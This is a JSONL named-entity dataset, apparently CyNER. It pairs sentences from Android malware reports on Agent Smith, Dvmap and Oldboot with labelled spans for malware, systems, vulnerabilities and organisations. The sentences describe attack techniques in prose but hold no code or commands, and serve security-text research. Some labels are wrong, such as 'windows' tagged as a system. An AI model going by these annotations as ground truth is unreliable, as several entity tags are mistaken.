{"text": "However , it could easily be used for far more intrusive and harmful purposes such as banking credential theft .", "spans": {}, "info": {"id": "cyner_train_001779", "source": "cyner_train"}}
{"text": "Indeed , due to its ability to hide it ’ s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user ’ s device .", "spans": {}, "info": {"id": "cyner_train_001780", "source": "cyner_train"}}
{"text": "Check Point Research has submitted data to Google and law enforcement units to facilitate further investigation .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[43, 49]]}, "info": {"id": "cyner_train_001781", "source": "cyner_train"}}
{"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were looking at an all-new malware campaign found in the wild .", "spans": {}, "info": {"id": "cyner_train_001786", "source": "cyner_train"}}
{"text": "After a series of technical analysis ( which is covered in detail below ) and heuristic threat hunting , we discovered that a complete “ Agent Smith ” infection has three main phases : A dropper app lures victim to install itself voluntarily .", "spans": {"MALWARE: Agent Smith": [[137, 148]]}, "info": {"id": "cyner_train_001787", "source": "cyner_train"}}
{"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files .", "spans": {}, "info": {"id": "cyner_train_001788", "source": "cyner_train"}}
{"text": "Dropper variants are usually barely functioning photo utility , games , or sex related apps .", "spans": {}, "info": {"id": "cyner_train_001789", "source": "cyner_train"}}
{"text": "The dropper automatically decrypts and installs its core malware APK which later conducts malicious patching and app updates .", "spans": {}, "info": {"id": "cyner_train_001790", "source": "cyner_train"}}
{"text": "The core malware is usually disguised as Google Updater , Google Update for U or “ com.google.vending ” .", "spans": {"ORGANIZATION: Google": [[41, 47], [58, 64]]}, "info": {"id": "cyner_train_001791", "source": "cyner_train"}}
{"text": "The core malware ’ s icon is hidden .", "spans": {}, "info": {"id": "cyner_train_001792", "source": "cyner_train"}}
{"text": "The core malware extracts the device ’ s installed app list .", "spans": {}, "info": {"id": "cyner_train_001793", "source": "cyner_train"}}
{"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update .", "spans": {}, "info": {"id": "cyner_train_001794", "source": "cyner_train"}}
{"text": "“ Agent Smith ” repacks its prey apps at smali/baksmali code level .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001795", "source": "cyner_train"}}
{"text": "In certain situations , variants intercept compromised apps ’ original legitimate ads display events and report back to the intended ad-exchange with the “ Agent Smith ” campaign hacker ’ s ad IDs .", "spans": {"MALWARE: Agent Smith": [[156, 167]]}, "info": {"id": "cyner_train_001798", "source": "cyner_train"}}
{"text": "Our intelligence shows “ Agent Smith ” droppers proliferate through third-party app store “ 9Apps ” , a UC team backed store , targeted mostly at Indian ( Hindi ) , Arabic , and Indonesian users .", "spans": {"MALWARE: Agent Smith": [[25, 36]], "SYSTEM: 9Apps": [[92, 97]]}, "info": {"id": "cyner_train_001799", "source": "cyner_train"}}
{"text": "“ Agent Smith ” itself , though , seems to target mainly India users .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001800", "source": "cyner_train"}}
{"text": "Technical Analysis “ Agent Smith ” has a modular structure and consists of the following modules : Loader Core Boot Patch AdSDK Updater As stated above , the first step of this infection chain is the dropper .", "spans": {"MALWARE: Agent Smith": [[21, 32]]}, "info": {"id": "cyner_train_001802", "source": "cyner_train"}}
{"text": "The dropper is a repacked legitimate application which contains an additional piece of code – “ loader ” .", "spans": {}, "info": {"id": "cyner_train_001803", "source": "cyner_train"}}
{"text": "If any application from that list was found , it utilizes the Janus vulnerability to inject the “ boot ” module into the repacked application .", "spans": {"VULNERABILITY: Janus": [[62, 67]]}, "info": {"id": "cyner_train_001806", "source": "cyner_train"}}
{"text": "After the next run of the infected application , the “ boot ” module will run the “ patch ” module , which hooks the methods from known ad SDKs to its own implementation .", "spans": {}, "info": {"id": "cyner_train_001807", "source": "cyner_train"}}
{"text": "Figure 1 : ‘ Agent Smith ’ s modular structure Technical Analysis – Loader Module The “ loader ” module , as stated above , extracts and runs the “ core ” module .", "spans": {"MALWARE: Agent Smith": [[13, 24]]}, "info": {"id": "cyner_train_001808", "source": "cyner_train"}}
{"text": "While the “ core ” module resides inside the APK file , it is encrypted and disguised as a JPG file – the first two bytes are actually the magic header of JPG files , while the rest of the data is encoded with an XOR cipher .", "spans": {}, "info": {"id": "cyner_train_001809", "source": "cyner_train"}}
{"text": "Figure 2 : “ Agent Smith ’ s jpg file structure After the extraction , the “ loader ” module adds the code to the application while using the legitimate mechanism by Android to handle large DEX files .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "SYSTEM: Android": [[166, 173]]}, "info": {"id": "cyner_train_001810", "source": "cyner_train"}}
{"text": "Figure 3 : Loading core malicious code into the benign application Once the “ core ” module is extracted and loaded , the “ loader ” uses the reflection technique to initialize and start the “ core ” module .", "spans": {}, "info": {"id": "cyner_train_001811", "source": "cyner_train"}}
{"text": "Figure 4 : Loader calls initialization method Technical Analysis – Core Module With the main purpose of spreading the infection , “ Agent Smith ” implements in the “ core ” module : A series of ‘ Bundle ’ vulnerabilities , which is used to install applications without the victim ’ s awareness .", "spans": {"MALWARE: Agent Smith": [[132, 143]], "VULNERABILITY: Bundle": [[196, 202]]}, "info": {"id": "cyner_train_001812", "source": "cyner_train"}}
{"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version .", "spans": {"VULNERABILITY: Janus": [[4, 9]]}, "info": {"id": "cyner_train_001813", "source": "cyner_train"}}
{"text": "The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender", "spans": {"SYSTEM: whatsapp": [[151, 159]]}, "info": {"id": "cyner_train_001814", "source": "cyner_train"}}
{"text": "eterno truecaller For each application on the list , the “ core ” module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space .", "spans": {}, "info": {"id": "cyner_train_001815", "source": "cyner_train"}}
{"text": "The decompile method is based on the fact that Android applications are Java-based , meaning it is possible to recompile it .", "spans": {"SYSTEM: Android": [[47, 54]]}, "info": {"id": "cyner_train_001818", "source": "cyner_train"}}
{"text": "Therefore , “ Agent Smith ” decompiles both the original application and the malicious payload and fuses them together .", "spans": {"MALWARE: Agent Smith": [[14, 25]]}, "info": {"id": "cyner_train_001819", "source": "cyner_train"}}
{"text": "Figure 5 : core module mixes malicious payload with the original application While decompiling the original app , “ Agent Smith ” has the opportunity to modify the methods inside , replace some of the methods in the original application that handles advertisement with its own code and focus on methods communicating with ‘ AdMob ’ , ‘ Facebook ’ , ‘ MoPub ’ and ‘ Unity Ads ’ .", "spans": {"MALWARE: Agent Smith": [[116, 127]], "SYSTEM: AdMob": [[324, 329]], "SYSTEM: Facebook": [[336, 344]], "SYSTEM: MoPub": [[351, 356]], "SYSTEM: Unity Ads": [[365, 374]]}, "info": {"id": "cyner_train_001820", "source": "cyner_train"}}
{"text": "Figure 6 : Targeted ad network Figure 7 : Injection example After all of the required changes , “ Agent Smith ” compiles the application and builds a DEX file containing both the original code of the original application and the malicious payload .", "spans": {"MALWARE: Agent Smith": [[98, 109]]}, "info": {"id": "cyner_train_001821", "source": "cyner_train"}}
{"text": "In some cases , the decompilation process will fail , and “ Agent Smith ” will try another method for infecting the original application – A binary patch , which simply provides a binary file of the “ boot ” module of “ Agent Smith ” .", "spans": {"MALWARE: Agent Smith": [[60, 71], [220, 231]]}, "info": {"id": "cyner_train_001822", "source": "cyner_train"}}
{"text": "Once the payload is prepared , “ Agent Smith ” uses it to build another APK file , exploiting the Janus vulnerability : Figure 8 : The new infected APK file structure Solely injecting the code of the loader is not enough .", "spans": {"MALWARE: Agent Smith": [[33, 44]], "VULNERABILITY: Janus": [[98, 103]]}, "info": {"id": "cyner_train_001823", "source": "cyner_train"}}
{"text": "This means that the only thing possible in this case is to replace its DEX file .", "spans": {}, "info": {"id": "cyner_train_001825", "source": "cyner_train"}}
{"text": "To overcome this issue , “ Agent Smith ” found another solution .", "spans": {"MALWARE: Agent Smith": [[27, 38]]}, "info": {"id": "cyner_train_001826", "source": "cyner_train"}}
{"text": "This action changes the original file size of the DEX file , which makes the malicious resources a part of the DEX file , a section that is ignored by the signature validation process .", "spans": {}, "info": {"id": "cyner_train_001828", "source": "cyner_train"}}
{"text": "Figure 9 : Malware secretly adds malicious resources to the DEX file Now , after the alteration of the original application , Android ’ s package manager will think that this is an update for the application signed by the same certificate , but in reality , it will execute the malicious DEX file .", "spans": {"SYSTEM: Android": [[126, 133]]}, "info": {"id": "cyner_train_001829", "source": "cyner_train"}}
{"text": "Even now , this is still not enough .", "spans": {}, "info": {"id": "cyner_train_001830", "source": "cyner_train"}}
{"text": "“ Agent Smith ” needs to be updated/installed without the user ’ s consent .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001831", "source": "cyner_train"}}
{"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application .", "spans": {}, "info": {"id": "cyner_train_001833", "source": "cyner_train"}}
{"text": "The system service ‘ AccountManagerService ’ looks for the application that can process this request .", "spans": {}, "info": {"id": "cyner_train_001834", "source": "cyner_train"}}
{"text": "While doing so , it will reach a service exported by “ Agent Smith ” , and sends out an authentication request that would lead to a call to the ‘ addAccount ’ method .", "spans": {"MALWARE: Agent Smith": [[55, 66]]}, "info": {"id": "cyner_train_001835", "source": "cyner_train"}}
{"text": "Figure 10 : The algorithm of the malicious update , while “ Agent Smith ” updates application If all that has failed , “ Agent Smith ” turns to Man-in-the-Disk vulnerability for ‘ SHAREit ’ or ‘ Xender ’ applications .", "spans": {"MALWARE: Agent Smith": [[60, 71], [121, 132]], "VULNERABILITY: Man-in-the-Disk": [[144, 159]], "SYSTEM: SHAREit": [[180, 187]], "SYSTEM: Xender": [[195, 201]]}, "info": {"id": "cyner_train_001837", "source": "cyner_train"}}
{"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload .", "spans": {}, "info": {"id": "cyner_train_001838", "source": "cyner_train"}}
{"text": "Figure 11 : ‘ Agent Smith ’ uses man-in-disk to install the malicious update Technical Analysis – Boot Module The “ boot ” module is basically another “ loader ” module , but this time it ’ s executed in the infected application .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "VULNERABILITY: man-in-disk": [[33, 44]]}, "info": {"id": "cyner_train_001839", "source": "cyner_train"}}
{"text": "The infected application contains its payload inside the DEX file .", "spans": {}, "info": {"id": "cyner_train_001841", "source": "cyner_train"}}
{"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset .", "spans": {}, "info": {"id": "cyner_train_001842", "source": "cyner_train"}}
{"text": "While investing a lot of resources in the development of this malware , the actor behind “ Agent Smith ” does not want a real update to remove all of the changes made , so here is where the “ patch ” module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears .", "spans": {"MALWARE: Agent Smith": [[91, 102]]}, "info": {"id": "cyner_train_001847", "source": "cyner_train"}}
{"text": "Another trick in “ Agent Smith ’ s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check .", "spans": {"MALWARE: Agent Smith": [[19, 30]]}, "info": {"id": "cyner_train_001848", "source": "cyner_train"}}
{"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim .", "spans": {}, "info": {"id": "cyner_train_001849", "source": "cyner_train"}}
{"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ .", "spans": {}, "info": {"id": "cyner_train_001850", "source": "cyner_train"}}
{"text": "“ Agent Smith ” will replace the original application ’ s activities with an in-house SDK ’ s activity , which will show the banner received from the server .", "spans": {"MALWARE: Agent Smith": [[2, 13]]}, "info": {"id": "cyner_train_001852", "source": "cyner_train"}}
{"text": "Among multiple sub-domains , “ ad.a * * * d.org ” and “ gd.a * * * d.org ” both historically resolved to the same suspicious IP address .", "spans": {}, "info": {"id": "cyner_train_001856", "source": "cyner_train"}}
{"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape “ Agent Smith ” droppers show a very greedy infection tactic .", "spans": {"MALWARE: Agent Smith": [[67, 78]]}, "info": {"id": "cyner_train_001862", "source": "cyner_train"}}
{"text": "It ’ s not enough for this malware family to swap just one innocent application with an infected double .", "spans": {}, "info": {"id": "cyner_train_001863", "source": "cyner_train"}}
{"text": "It does so for each and every app on the device as long as the package names are on its prey list .", "spans": {}, "info": {"id": "cyner_train_001864", "source": "cyner_train"}}
{"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches .", "spans": {}, "info": {"id": "cyner_train_001865", "source": "cyner_train"}}
{"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications .", "spans": {}, "info": {"id": "cyner_train_001866", "source": "cyner_train"}}
{"text": "As an initial attack vector , “ Agent Smith ” abuses the 9Apps market – with over 360 different dropper variants .", "spans": {"MALWARE: Agent Smith": [[32, 43]], "SYSTEM: 9Apps": [[57, 62]]}, "info": {"id": "cyner_train_001867", "source": "cyner_train"}}
{"text": "To maximize profit , variants with “ MinSDK ” or “ OTA ” SDK are present to further infect victims with other adware families .", "spans": {}, "info": {"id": "cyner_train_001868", "source": "cyner_train"}}
{"text": "The majority of droppers in 9Apps are games , while the rest fall into categories of adult entertainment , media player , photo utilities , and system utilities .", "spans": {"SYSTEM: 9Apps": [[28, 33]]}, "info": {"id": "cyner_train_001869", "source": "cyner_train"}}
{"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The “ Agent Smith ” campaign is primarily targeted at Indian users , who represent 59 % of the impacted population .", "spans": {"MALWARE: Agent Smith": [[281, 292]]}, "info": {"id": "cyner_train_001870", "source": "cyner_train"}}
{"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , “ Agent Smith ” has a significant impact upon not only developing countries but also some developed countries where GP is readily available .", "spans": {"SYSTEM: Google Play": [[32, 43]], "MALWARE: Agent Smith": [[76, 87]]}, "info": {"id": "cyner_train_001871", "source": "cyner_train"}}
{"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by “ Agent Smith ” , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions .", "spans": {"MALWARE: Agent Smith": [[100, 111]], "SYSTEM: Android": [[217, 224], [411, 418]], "SYSTEM: Android 5 and 6": [[323, 338]]}, "info": {"id": "cyner_train_001873", "source": "cyner_train"}}
{"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 .", "spans": {"VULNERABILITY: Janus": [[17, 22]]}, "info": {"id": "cyner_train_001875", "source": "cyner_train"}}
{"text": "However , in order to block Janus abuse , app developers need to sign their apps with the new scheme so that Android framework security component could conduct integrity checks with enhanced features .", "spans": {"VULNERABILITY: Janus": [[28, 33]], "SYSTEM: Android": [[109, 116]]}, "info": {"id": "cyner_train_001876", "source": "cyner_train"}}
{"text": "Figure 25 : infected Android version distribution To further analyze “ Agent Smith ” ’ s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Agent Smith": [[71, 82]]}, "info": {"id": "cyner_train_001877", "source": "cyner_train"}}
{"text": "App Swap Per Device Avg .", "spans": {}, "info": {"id": "cyner_train_001878", "source": "cyner_train"}}
{"text": "Months Device Remained Infected India 15,230,123 2,017,873,249 2.6 1.7 2.1 Bangladesh 2,539,913 208,026,886 2.4 1.5 2.2 Pakistan 1,686,216 94,296,907 2.4 1.6 2 Indonesia 572,025 67,685,983 2 1.5 2.2 Nepal 469,274 44,961,341 2.4 1.6 2.4 US 302,852 19,327,093 1.7 1.4 1.8 Nigeria 287,167 21,278,498 2.4 1.3 2.3 Hungary 282,826 7,856,064 1.7 1.3 1.7 Saudi Arabia 245,698 18,616,259 2.3", "spans": {}, "info": {"id": "cyner_train_001880", "source": "cyner_train"}}
{"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 “ Agent Smith ” Timeline Early signs of activity from the actor behind “ Agent Smith ” can be traced back to January 2016 .", "spans": {"MALWARE: Agent Smith": [[48, 59]]}, "info": {"id": "cyner_train_001881", "source": "cyner_train"}}
{"text": "We classify this 40-month period into three main stages .", "spans": {}, "info": {"id": "cyner_train_001882", "source": "cyner_train"}}
{"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up windows .", "spans": {"SYSTEM: windows": [[136, 143]]}, "info": {"id": "cyner_train_001884", "source": "cyner_train"}}
{"text": "However , samples don ’ t have key capabilities to infect innocent apps on victim devices yet .", "spans": {}, "info": {"id": "cyner_train_001886", "source": "cyner_train"}}
{"text": "May 2018 to April 2019 : This is the actual mature stage of “ Agent Smith ” campaign .", "spans": {"MALWARE: Agent Smith": [[62, 73]]}, "info": {"id": "cyner_train_001887", "source": "cyner_train"}}
{"text": "From early 2018 prior to May , “ Agent Smith ” hackers started to experiment with Bundle Feng Shui , the key tool which gives “ Agent Smith ” malware family capabilities to infect innocent apps on the device .", "spans": {"MALWARE: Agent Smith": [[33, 44], [128, 139]]}, "info": {"id": "cyner_train_001888", "source": "cyner_train"}}
{"text": "A series of pilot runs were executed .", "spans": {}, "info": {"id": "cyner_train_001889", "source": "cyner_train"}}
{"text": "Its dropper family finished integration with Bundle Feng Shui and campaign C & C infrastructure was shifted to AWS cloud .", "spans": {"SYSTEM: AWS": [[111, 114]]}, "info": {"id": "cyner_train_001891", "source": "cyner_train"}}
{"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of “ Agent Smith ” dropped significantly .", "spans": {"MALWARE: Agent Smith": [[73, 84]]}, "info": {"id": "cyner_train_001893", "source": "cyner_train"}}
{"text": "From early April , hackers started to build a new major update to the “ Agent Smith ” campaign under the name “ leechsdk ” .", "spans": {"MALWARE: Agent Smith": [[72, 83]]}, "info": {"id": "cyner_train_001894", "source": "cyner_train"}}
{"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests .", "spans": {}, "info": {"id": "cyner_train_001896", "source": "cyner_train"}}
{"text": "During our extended threat hunting , we uncovered 11 apps on the Google Play store that contain a malicious yet dormant SDK related to “ Agent Smith ” actor .", "spans": {"SYSTEM: Google Play store": [[65, 82]], "MALWARE: Agent Smith": [[137, 148]]}, "info": {"id": "cyner_train_001897", "source": "cyner_train"}}
{"text": "Instead of embedding core malware payload in droppers , the actor switches to a more low-key SDK approach .", "spans": {}, "info": {"id": "cyner_train_001899", "source": "cyner_train"}}
{"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch .", "spans": {}, "info": {"id": "cyner_train_001902", "source": "cyner_train"}}
{"text": "The below code snippet is currently isolated and dormant .", "spans": {}, "info": {"id": "cyner_train_001903", "source": "cyner_train"}}
{"text": "In the future , it will be invoked by malicious SDK during banner ads display .", "spans": {}, "info": {"id": "cyner_train_001904", "source": "cyner_train"}}
{"text": "Check Point Research reported these dangerous apps to Google upon discovery .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[54, 60]]}, "info": {"id": "cyner_train_001907", "source": "cyner_train"}}
{"text": "Interestingly , we uncovered several expired job posting of Android reverse engineer from the actor ’ s front business published in 2018 and 2019 .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_001911", "source": "cyner_train"}}
{"text": "It seems that the people who filled these roles are key to “ Agent Smith ’ s success , yet not quite necessary for actor ’ s legitimate side of business .", "spans": {"MALWARE: Agent Smith": [[61, 72]]}, "info": {"id": "cyner_train_001912", "source": "cyner_train"}}
{"text": "With a better understanding of the “ Agent Smith ” actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor ’ s unusual practices in choosing targets .", "spans": {"MALWARE: Agent Smith": [[37, 48]]}, "info": {"id": "cyner_train_001913", "source": "cyner_train"}}
{"text": "It seems , “ Agent Smith ” prey list does not only have popular yet Janus vulnerable apps to ensure high proliferation , but also contain competitor apps of actor ’ s legitimate business arm to suppress competition .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "VULNERABILITY: Janus": [[68, 73]]}, "info": {"id": "cyner_train_001914", "source": "cyner_train"}}
{"text": "Conclusion Although the actor behind “ Agent Smith ” decided to make their illegally acquired profit by exploiting the use of ads , another actor could easily take a more intrusive and harmful route .", "spans": {"MALWARE: Agent Smith": [[39, 50]]}, "info": {"id": "cyner_train_001915", "source": "cyner_train"}}
{"text": "With the ability to hide its icon from the launcher and hijack popular existing apps on a device , there are endless possibilities to harm a user ’ s digital even physical security .", "spans": {}, "info": {"id": "cyner_train_001916", "source": "cyner_train"}}
{"text": "Today this malware shows unwanted ads , tomorrow it could steal sensitive information ; from private messages to banking credentials and much more .", "spans": {}, "info": {"id": "cyner_train_001917", "source": "cyner_train"}}
{"text": "It requires attention and action from system developers , device manufacturers , app developers , and users , so that vulnerability fixes are patched , distributed , adopted and installed in time .", "spans": {}, "info": {"id": "cyner_train_001919", "source": "cyner_train"}}
{"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store .", "spans": {"MALWARE: Dvmap": [[0, 5]], "SYSTEM: Android": [[18, 25]], "SYSTEM: Google Play Store": [[151, 168]]}, "info": {"id": "cyner_train_001921", "source": "cyner_train"}}
{"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]]}, "info": {"id": "cyner_train_001923", "source": "cyner_train"}}
{"text": "The distribution of rooting malware through Google Play is not a new thing .", "spans": {"SYSTEM: Google Play": [[44, 55]]}, "info": {"id": "cyner_train_001924", "source": "cyner_train"}}
{"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 .", "spans": {"MALWARE: Ztorg Trojan": [[18, 30]], "SYSTEM: Google Play": [[52, 63]]}, "info": {"id": "cyner_train_001925", "source": "cyner_train"}}
{"text": "But Dvmap is very special rooting malware .", "spans": {"MALWARE: Dvmap": [[4, 9]]}, "info": {"id": "cyner_train_001926", "source": "cyner_train"}}
{"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries – libdmv.so or libandroid_runtime.so .", "spans": {}, "info": {"id": "cyner_train_001927", "source": "cyner_train"}}
{"text": "This makes Dvmap the first Android malware that injects malicious code into the system libraries in runtime , and it has been downloaded from the Google Play Store more than 50,000 times .", "spans": {"MALWARE: Dvmap": [[11, 16]], "SYSTEM: Android": [[27, 34]], "SYSTEM: Google Play Store": [[146, 163]]}, "info": {"id": "cyner_train_001928", "source": "cyner_train"}}
{"text": "Kaspersky Lab reported the Trojan to Google , and it has now been removed from the store .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "ORGANIZATION: Google": [[37, 43]]}, "info": {"id": "cyner_train_001929", "source": "cyner_train"}}
{"text": "To bypass Google Play Store security checks , the malware creators used a very interesting method : they uploaded a clean app to the store at the end of March , 2017 , and would then update it with a malicious version for short period of time .", "spans": {"SYSTEM: Google Play Store": [[10, 27]]}, "info": {"id": "cyner_train_001930", "source": "cyner_train"}}
{"text": "Usually they would upload a clean version back on Google Play the very same day .", "spans": {"SYSTEM: Google Play": [[50, 61]]}, "info": {"id": "cyner_train_001931", "source": "cyner_train"}}
{"text": "All the malicious Dvmap apps had the same functionality .", "spans": {"MALWARE: Dvmap": [[18, 23]]}, "info": {"id": "cyner_train_001933", "source": "cyner_train"}}
{"text": "They decrypt several archive files from the assets folder of the installation package , and launch an executable file from them with the name “ start. ” The interesting thing is that the Trojan supports even the 64-bit version of Android , which is very rare .", "spans": {"SYSTEM: Android": [[230, 237]]}, "info": {"id": "cyner_train_001934", "source": "cyner_train"}}
{"text": "All encrypted archives can be divided into two groups : the first comprises Game321.res , Game322.res , Game323.res and Game642.res – and these are used in the initial phase of infection , while the second group : Game324.res and Game644.res , are used in the main phase .", "spans": {}, "info": {"id": "cyner_train_001935", "source": "cyner_train"}}
{"text": "All archives from this phase contain the same files except for one called “ common ” .", "spans": {}, "info": {"id": "cyner_train_001937", "source": "cyner_train"}}
{"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems .", "spans": {}, "info": {"id": "cyner_train_001938", "source": "cyner_train"}}
{"text": "If these files successfully gain root rights , the Trojan will install several tools into the system .", "spans": {}, "info": {"id": "cyner_train_001939", "source": "cyner_train"}}
{"text": "It will check the version of Android installed and decide which library should be patched .", "spans": {"SYSTEM: Android": [[29, 36]]}, "info": {"id": "cyner_train_001941", "source": "cyner_train"}}
{"text": "For Android 4.4.4 and older , the Trojan will patch method _Z30dvmHeapSourceStartupBeforeForkv from libdvm.so , and for Android 5 and newer it will patch method nativeForkAndSpecialize from libandroid_runtime.so .", "spans": {"SYSTEM: Android 4.4.4": [[4, 17]], "SYSTEM: Android": [[120, 127]]}, "info": {"id": "cyner_train_001942", "source": "cyner_train"}}
{"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments .", "spans": {"SYSTEM: Dalvik": [[57, 63]], "SYSTEM: ART": [[68, 71]]}, "info": {"id": "cyner_train_001943", "source": "cyner_train"}}
{"text": "Before patching , the Trojan will backup the original library with a name bak_ { original name } .", "spans": {}, "info": {"id": "cyner_train_001944", "source": "cyner_train"}}
{"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip .", "spans": {}, "info": {"id": "cyner_train_001945", "source": "cyner_train"}}
{"text": "This could be very dangerous and cause some devices to crash following the overwrite .", "spans": {}, "info": {"id": "cyner_train_001946", "source": "cyner_train"}}
{"text": "Then the Trojan will put the patched library back into the system directory .", "spans": {}, "info": {"id": "cyner_train_001947", "source": "cyner_train"}}
{"text": "This means that all apps that were using this file will lose some functionality or even start crashing .", "spans": {}, "info": {"id": "cyner_train_001951", "source": "cyner_train"}}
{"text": "Malicious module “ ip ” This file will be executed by the patched system library .", "spans": {}, "info": {"id": "cyner_train_001952", "source": "cyner_train"}}
{"text": "It can turn off “ VerifyApps ” and enable the installation of apps from 3rd party stores by changing system settings .", "spans": {}, "info": {"id": "cyner_train_001953", "source": "cyner_train"}}
{"text": "It is a very unusual way to get Device Administrator rights .", "spans": {}, "info": {"id": "cyner_train_001955", "source": "cyner_train"}}
{"text": "Malicious app com.qualcmm.timeservices As I mentioned before , in the “ initial phase ” , the Trojan will install the “ com.qualcmm.timeservices ” app .", "spans": {}, "info": {"id": "cyner_train_001956", "source": "cyner_train"}}
{"text": "Its main purpose is to download archives and execute the “ start ” binary from them .", "spans": {}, "info": {"id": "cyner_train_001957", "source": "cyner_train"}}
{"text": "During the investigation , this app was able to successfully connect to the command and control server , but it received no commands .", "spans": {}, "info": {"id": "cyner_train_001958", "source": "cyner_train"}}
{"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries .", "spans": {"SYSTEM: Google Play Store": [[52, 69]]}, "info": {"id": "cyner_train_001960", "source": "cyner_train"}}
{"text": "It installs malicious modules with different functionality into the system .", "spans": {}, "info": {"id": "cyner_train_001961", "source": "cyner_train"}}
{"text": "It looks like its main purpose is to get into the system and execute downloaded files with root rights .", "spans": {}, "info": {"id": "cyner_train_001962", "source": "cyner_train"}}
{"text": "But I never received such files from their command and control server .", "spans": {}, "info": {"id": "cyner_train_001963", "source": "cyner_train"}}
{"text": "These malicious modules report to the attackers about every step they are going to make .", "spans": {}, "info": {"id": "cyner_train_001964", "source": "cyner_train"}}
{"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices .", "spans": {}, "info": {"id": "cyner_train_001965", "source": "cyner_train"}}
{"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods .", "spans": {}, "info": {"id": "cyner_train_001967", "source": "cyner_train"}}
{"text": "MD5 43680D1914F28E14C90436E1D42984E2 20D4B9EB9377C499917C4D69BF4CCEBE First widely distributed Android bootkit Malware infects more than 350,000 Devices January 29 , 2014 In the last quarter of 2013 , sale of a Smartphone with ANDROID operating system has increased and every second person you see is a DROID user .", "spans": {"SYSTEM: Android": [[95, 102]], "SYSTEM: ANDROID": [[227, 234]], "SYSTEM: DROID": [[303, 308]]}, "info": {"id": "cyner_train_001968", "source": "cyner_train"}}
{"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it .", "spans": {"ORGANIZATION: Web": [[32, 35]], "SYSTEM: Android": [[76, 83]]}, "info": {"id": "cyner_train_001969", "source": "cyner_train"}}
{"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries .", "spans": {"MALWARE: Android.Oldboot": [[12, 27]], "SYSTEM: android": [[59, 66]]}, "info": {"id": "cyner_train_001970", "source": "cyner_train"}}
{"text": "China seems to a mass victim of this kind of malware having a 92 % share .", "spans": {}, "info": {"id": "cyner_train_001971", "source": "cyner_train"}}
{"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller .", "spans": {}, "info": {"id": "cyner_train_001972", "source": "cyner_train"}}
